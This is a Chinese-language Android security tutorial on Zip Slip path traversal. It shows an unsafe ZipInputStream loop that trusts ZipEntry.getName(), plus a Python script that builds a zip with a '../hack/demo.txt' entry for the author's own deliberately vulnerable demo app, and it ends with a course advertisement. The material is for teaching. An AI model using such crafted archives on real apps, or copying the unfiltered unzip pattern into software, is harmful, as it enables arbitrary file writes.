漏洞免费实战部分-安卓应用层getLastPathSegment函数问题
本节课介绍ZipEntry对象,这个对象常用于解压压缩包操作。
/ This class is used to represent a ZIP file entry.
// Author:
// David Connelly
public
class ZipEntry implements ZipConstants, Cloneable {
String name; // entry name
long xdostime = -1; // last modification time (in extended DOS time,
// where milliseconds lost in conversion might
// be encoded into the upper half)
FileTime mtime; // last modification time, from extra field data
FileTime atime; // last access time, from extra field data
FileTime ctime; // creation time, from extra field data
long crc = -1; // crc-32 of entry data
long size = -1; // uncompressed size of entry data
long csize = -1; // compressed size of entry data
int method = -1; // compression method
int flag = 0; // general purpose flag
byte[] extra; // optional extra field data for entry
String comment; // optional comment string for entry
// Android-added: Add dataOffset for internal use.
// Used by android.util.jar.StrictJarFile from frameworks.
long dataOffset;
注释说明这个类对象是操作ZIP 文件的,App中Zip解压缩操作是最容易出差的地方。
常用的代码格式如下:
FileInputStream fileinputstream = new FileInputStream("/sdcard/case2.zip");
ZipInputStream zipInputStream = new ZipInputStream(fileinputstream);
ZipEntry zipEntry;
while ((zipEntry = zipInputStream.getNextEntry()) != null) {
...
代码以流的形式读取文件再转为ZipEntry操作对象.其中zipEntry.getName()函数是获取压缩文件的文件名。当存在一个文件名包含../../../时,zipEntry.getName()也一并返回.如果后面没有过滤../那么继续执行就会目录穿越出去。
实战案例:
为了学习这个漏洞,我实现了一个App,通过这个App来理解利用。
功能:
App只有一个功能,接收zip包文件路径。
代码:
App启动时再私有目录下创建两个目录tmp、hack,正常的zip包传给App是无法解压到hack目录下。
创建一个带../的压缩包构造好穿越路径,使App解压包到hack目录下。
这里提供一个python脚本,用这个脚本可以生成包含../../的压缩文件。
import zipfile
if __name__ == "__main__":
try:
binary = 'hello hack'
zipFile = zipfile.ZipFile("case2.zip","a",zipfile.ZIP_DEFLATED)
zipfile.ZipInfo("case2.zip")
zipFile.writestr("../hack/demo.txt",binary)
zipFile.close()
except IOError as e:
raise e
将生成的case2.zip push到手机设备或模拟器中的/sdcard/目录下。
启动case2.apk 输入 /sdcard/case2.zip 完成。
如果感兴趣可以了解下漏洞视频教程目录如下:
关注微信公众号或者可以直接加作者微信:
其它学习教程。